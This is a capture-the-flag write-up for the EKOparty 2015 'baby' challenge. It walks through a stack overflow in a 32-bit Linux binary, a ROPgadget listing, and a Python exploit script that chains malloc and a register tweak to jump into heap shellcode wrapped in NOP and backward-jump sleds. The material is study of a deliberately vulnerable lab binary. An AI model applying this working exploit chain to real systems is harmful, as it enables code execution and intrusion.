EKOparty 2015 baby

@mrexcessive & Cam & Ben WHA

EKOparty 2015 baby

Too much ROP can be a problem

 

The problem

50 points (REALLY @EkoParty !)

32bit C program linux env. Need to exploit it and get shell to find flag.

Pwnable Exploit source-provided binary-provided

 

The solution

FULL DISCLOSURE - not solved until after the event had finished. We have since read 2 other writeups but their methods were different - and different from each other.

Thanks to Team amn3s1a for their encouragement and letting us see their code after event - but before we had finished.


This is more of a tale of persistence than success... though maybe a little success in the end.

Cam, Ben and Tim had already solved the core of getting to the point of ROP when I joined effort. We were expecting and hoping it would be a shellcode on stack, or somewhere callable.

It appeared that two connections would not share memory usefully, although one of the other teams' writeups has successfully adopted that approach.

We have C source code. The area where we can get control of execution is this:

int __cdecl vul(unsigned __int8 *buf, unsigned int a2)
{
  int result; // eax@10
  char dest[24]; // [sp+10h] [bp-28h]@7
  unsigned int v4; // [sp+28h] [bp-10h]@1
  int i; // [sp+2Ch] [bp-Ch]@7
‚Äč
  v4 = 4 * buf[10];
  if ( v4 > a2 )
  {
    fwrite("Invalid size!\n", 1u, 0xEu, stderr);
    exit(1);
  }
  if ( *buf != buf[1] + 1 || buf[2] != *buf + buf[1] + 2 || buf[3] != buf[1] + buf[2] + 4 )
  {
    result = puts("It's bad:");
  }
  else
  {
    memcpy(dest, buf + 4, 0x50u);
    puts("decoded:");
    for ( i = 0; i < (signed int)v4; ++i )
      putchar((unsigned __int8)dest[i] ^ 0x158);
    result = putchar(10);
  }
  return result;
}

The memcpy() stamps 80 bytes all over the stack. Blatting the v4 and result variables as well as stack frame (saved EBP) and return address. We can upload 0x3ff bytes into the buf[] byte array, 80 of them will be used to overwrite.

But in order to get to the memcpy() you have to provide a crafted 4 byte key.

A working key was created "\x07\x06\x0F\x19' and we had access to memcpy() and for the next 48h nothing much except segment faults!

We could extract data from the process through the putchar loop, the value of v4 was being overwritten during the memcpy() so it took a while. We could only get 2 pages of stack data this way. The received data had to be xor'd with 0x58 to recover the original binary.

   for c in r:
      o = ord(c) ^ 0x58;
      sys.stdout.write("%02x " % o)
      sys.stdout.flush()
      rx += chr(o)

We wanted a shell. Unfortunately ALSR was in place.

The process could be made to leak stack addresses, but because the connection dropped after one exchange, these addresses were (I wrongly thought) useless. This alternate writeup uses the leaked addresses to complete an exploit.



A tricky problem

The event was over, but I wanted resolution on this.

There didn't seem to be a way to pivot EIP onto the stack. We only had space for 9 ROP instructions. In addition the ROP gadgets found were very poor. Plus there was a problem with the LEAVE instruction needing writeable memory.

It looked as though the shellcode would have to go on the heap, where we could write up to 0x3ff bytes of data... but how to find it !

I realised after a while that malloc() would do this if successful, but struggled to recover a useable address. After a few more hours I read some code - which had got another team the flag - and which did indeed use malloc() to get the page location of the heap.


Team amn3s1a very helpfully let us see their code at this point, you can see it here https://gist.github.com/soez/4ee5eb07d4a3982815ad
Unfortunately, I couldn't get it to give me a shell locally - and the event had finished so no way for remote test.

In addition to confirming that malloc() was the way forward, I also learned the new (to me) trick of using the __isoc99_scanf@plt pointer in the GOT as a writeable address, suitable for EBP, from the other code.

However.. I wanted an exploit which would work reliably. I couldn't get their code to give me a shell on the local binary - though it had plainly worked on the flag for them. They had a pile of short backward relative jumps after their shellcode, as well as a tiny NOPsled in front. The REVsled as I started calling it seemed an excellent idea, not done that before.


The malloc() call is returning a pointer to the heap allocation in eax and also edx. We can do a call *eax or call *edx, but they won't work, because the new allocated space is always ahead of anything we can upload in the 0x3ff bytes.

So the seemingly trivial task of using ROP to subtract 0x100 or a similar quantity from eax or edx is arrived at. Sometime on Sunday afternoon this problem starts to really bite.   There are a tiny number of useable ROP instructions (found using the excellent ROPgadget.py) - I've dropped all of those which feature a LEAVE ; RET ending, because they are no use to us.

Gadgets information
============================================================
0x0804860c : add al, -0x39 ; add al, 0x24 ; pushal ; wait ; add al, 8 ; call edx
0x08048659 : add al, 0x24 ; and al, 0xffffff9a ; add al, 8 ; call eax
0x080485d1 : add al, 0x24 ; pushal ; wait ; add al, 8 ; call eax
0x0804860e : add al, 0x24 ; pushal ; wait ; add al, 8 ; call edx
0x08048638 : add al, 8 ; add ecx, ecx ; ret
0x080485d5 : add al, 8 ; call eax
0x08048612 : add al, 8 ; call edx
0x080485b8 : add al, 8 ; cmp eax, 6 ; ja 0x80485c9 ; ret
0x08048797 : add al, ch ; ret
0x08048702 : add bh, byte ptr [ecx] ; ret 0x850f
0x08048795 : add byte ptr [eax], al ; add al, ch ; ret
0x08048485 : add byte ptr [eax], al ; add byte ptr [ebx - 0x7f], bl ; ret
0x0804886b : add byte ptr [eax], al ; add cl, cl ; ret
0x08048487 : add byte ptr [ebx - 0x7f], bl ; ret
0x0804886d : add cl, cl ; ret
0x080485be : add dh, bl ; ret
0x08048635 : add eax, 0x8049b84 ; add ecx, ecx ; ret
0x080485f2 : add eax, edx ; sar eax, 1 ; jne 0x8048601 ; ret
0x0804863a : add ecx, ecx ; ret
0x080488d2 : add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080485d2 : and al, 0x60 ; wait ; add al, 8 ; call eax
0x0804860f : and al, 0x60 ; wait ; add al, 8 ; call edx
0x08048793 : and al, 0xa ; add byte ptr [eax], al ; add al, ch ; ret
0x0804865b : and al, 0xffffff9a ; add al, 8 ; call eax
0x0804860b : and al, 4 ; mov dword ptr [esp], 0x8049b60 ; call edx
0x08048886 : call 0x80488e0
0x080485d7 : call eax
0x08048614 : call edx
0x080485f5 : clc ; jne 0x80485fe ; ret
0x080485bb : clc ; push es ; ja 0x80485c6 ; ret
0x08048180 : cld ; xchg eax, ebp ; dec esp ; movsd dword ptr es:[edi], dword ptr [esi] ; pop es ; inc edx ; ret
0x080485ba : cmp eax, 6 ; ja 0x80485c7 ; ret
0x080487aa : dec ecx ; ret
0x08048182 : dec esp ; movsd dword ptr es:[edi], dword ptr [esi] ; pop es ; inc edx ; ret
0x080488d1 : fiadd word ptr [ebx + 0x5e5b1cc4] ; pop edi ; pop ebp ; ret
0x08048656 : in al, dx ; sbb bh, al ; add al, 0x24 ; and al, 0xffffff9a ; add al, 8 ; call eax
0x080485ce : in al, dx ; sbb bh, al ; add al, 0x24 ; pushal ; wait ; add al, 8 ; call eax
0x08048872 : in eax, 0x5d ; ret
0x08048185 : inc edx ; ret
0x080485bd : ja 0x80485c4 ; ret
0x080488d0 : jb 0x80488b9 ; add esp, 0x1c ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080485f6 : jne 0x80485fd ; ret
0x080488d3 : les ebx, ptr [ebx + ebx*2] ; pop esi ; pop edi ; pop ebp ; ret
0x080485f0 : ljmp 0x75f8:0xd1d0011f ; add dh, bl ; ret
0x0804817d : loop 0x804817f ; push eax ; cld ; xchg eax, ebp ; dec esp ; movsd dword ptr es:[edi], dword ptr [esi] ; pop es ; inc edx ; ret
0x08048658 : mov dword ptr [esp], 0x8049a24 ; call eax
0x080485d0 : mov dword ptr [esp], 0x8049b60 ; call eax
0x0804860d : mov dword ptr [esp], 0x8049b60 ; call edx
0x08048871 : mov ebp, esp ; pop ebp ; ret
0x080488da : mov ebx, dword ptr [esp] ; ret
0x08048183 : movsd dword ptr es:[edi], dword ptr [esi] ; pop es ; inc edx ; ret
0x0804817e : not dword ptr [eax - 4] ; xchg eax, ebp ; dec esp ; movsd dword ptr es:[edi], dword ptr [esi] ; pop es ; inc edx ; ret
0x080485d6 : or bh, bh ; ror cl, 1 ; ret
0x08048613 : or bh, bh ; ror cl, cl ; ret
0x080485b9 : or byte ptr [ebx + 0x27706f8], al ; ret
0x080485f1 : pop ds ; add eax, edx ; sar eax, 1 ; jne 0x8048602 ; ret
0x08048873 : pop ebp ; ret
0x080488d5 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080488d7 : pop edi ; pop ebp ; ret
0x08048184 : pop es ; inc edx ; ret
0x080488d6 : pop esi ; pop edi ; pop ebp ; ret
0x0804817f : push eax ; cld ; xchg eax, ebp ; dec esp ; movsd dword ptr es:[edi], dword ptr [esi] ; pop es ; inc edx ; ret
0x08048870 : push ebp ; mov ebp, esp ; pop ebp ; ret
0x08048885 : push ebx ; call 0x80488e1
0x08048883 : push edi ; push esi ; push ebx ; call 0x80488e3
0x080485bc : push es ; ja 0x80485c5 ; ret
0x08048884 : push esi ; push ebx ; call 0x80488e2
0x080485d3 : pushal ; wait ; add al, 8 ; call eax
0x08048610 : pushal ; wait ; add al, 8 ; call edx
0x080485f3 : rcl cl, 1 ; clc ; jne 0x8048600 ; ret
0x08048186 : ret
0x080486d9 : ret 0
0x080486d3 : ret 0x3901
0x08048732 : ret 0x3904
0x08048704 : ret 0x850f
0x080485ee : ret 0xeac1
0x080486ca : ret 0xf01
0x08048727 : ret 0xf02
0x08048701 : rol byte ptr [edx], 0x39 ; ret 0x850f
0x080485d8 : ror cl, 1 ; ret
0x08048615 : ror cl, cl ; ret
0x080485f4 : sar eax, 1 ; jne 0x80485ff ; ret
0x080488db : sbb al, 0x24 ; ret
0x080488d4 : sbb al, 0x5b ; pop esi ; pop edi ; pop ebp ; ret
0x08048657 : sbb bh, al ; add al, 0x24 ; and al, 0xffffff9a ; add al, 8 ; call eax
0x080485cf : sbb bh, al ; add al, 0x24 ; pushal ; wait ; add al, 8 ; call eax
0x08048636 : test byte ptr [ebx - 0x36fef7fc], bl ; ret
0x08048637 : wait ; add al, 8 ; add ecx, ecx ; ret
0x080485d4 : wait ; add al, 8 ; call eax
0x08048611 : wait ; add al, 8 ; call edx
0x080485b7 : wait ; add al, 8 ; cmp eax, 6 ; ja 0x80485ca ; ret
0x08048181 : xchg eax, ebp ; dec esp ; movsd dword ptr es:[edi], dword ptr [esi] ; pop es ; inc edx ; ret

The constraint of these instructions, plus the limit of 9 ROP instructions due to how the 0x50 overwritten bytes land on the stack, makes creating a solution something like solving a Sudoku and also strangely like creating a BrainFuck program...

... if you have the time... take a moment and look through those instructions - join me in this pain !!


It is not until Monday afternoon and time off doing other things, that I hit on a working solution.

I can sit two of the instructions on top of each other, and reuse the malloc space to get 0xfe loaded into bl, from where it can modify edx and then the call *edx will work and a shell will be delivered.

The key to the solution is this:

0x8048510    malloc()
0x80488d5    pop ebx ; pop esi ; pop edi ; pop ebp ; ret   - malloc will return to this
0xff         size of malloc allocation (255 bytes)   and also pop ebx value (-1 => bl)
0x0          0 -> esi
0x0          0 -> edi
0x0          0 -> ebp    - at this point we don't care about esi, edi or ebp
0x80485be    add dh,bl ; ret    - which is effectively decrement dh
0x8048614    call *$edx



The other cunning part of the plan is to wrap the shellcode in both a NOPsled and REVsled, with a payload skipping jump between shellcode and REVsled - so it always works... probably(tm)

    NOPsled         "\x90" bytes for a while
    shellcode        we slide into this...
    backjump * 2    get around the shellcode no matter which we land on
    REVsled         "\xeb\xfa" pairs of bytes go back 4 bytes at a time... always hit one of the backjump


The core of the pwnserver Python script is this:

def PwnServer():
   shellcode = GetShellcode()
   r = GetResponse()
   print r
   buf = "A" * 24
   buf += p(0x01)    # v4 patched to be 1
   buf += "A" * 12
   buf += p(0x8049b54)     # EBP value = where __fscanf() is pointing = writeable
#--- 9 ROP instructions available from here
   buf += p(0x8048510)     # malloc
   buf += p(0x80488d5)     # pop ebx; pop esi; pop edi; pop ebp; ret
   buf += p(0xff)          # size of malloc = 0xff (255) bytes, but also -1 => bl on the pop ebx
   buf += p(0)             # esi popped don't care
   buf += p(0)             # edi popped don't care
   buf += p(0)             # ebp popped don't care
   buf += p(0x80485be)     # add dh,bl ; ret    # this adjusts dh (the malloc space ptr) back a page
   buf += p(0x8048614)     # call *$edx
   s.send('500\n')
   print "length sent"
   r = GetResponse()
   print r
   if True:
      nopsled_length = 37
      nopsled = "\x90" * nopsled_length
      revtrap = "\xeb\xc0" * 2      # catch the revsled and send it to before shellcode
      shellcode += revtrap
      revsled_length = ( 500 - (4 + len(buf) + len(shellcode) + 1 + nopsled_length) ) / 2
      shellend = "\xeb\xce"*2      # -50 reverse jump into nopsled
      revsled = "\xeb\xfa" * revsled_length     # jmp .-6 ($EIP -= 0x04, because already advanced +2)
      s.send('\x07\x06\x0F\x19' + buf + nopsled + shellcode + revsled + '\n')
   print "data sent"

And success - well locally.
The original baby challenge binary is available on github in the CTF writeups


Never got the flag ;( didn't finish until 6 hrs into effort on Monday.
But got the exploit to work - and learned a lot more about ROP and pivoting to the heap in the process!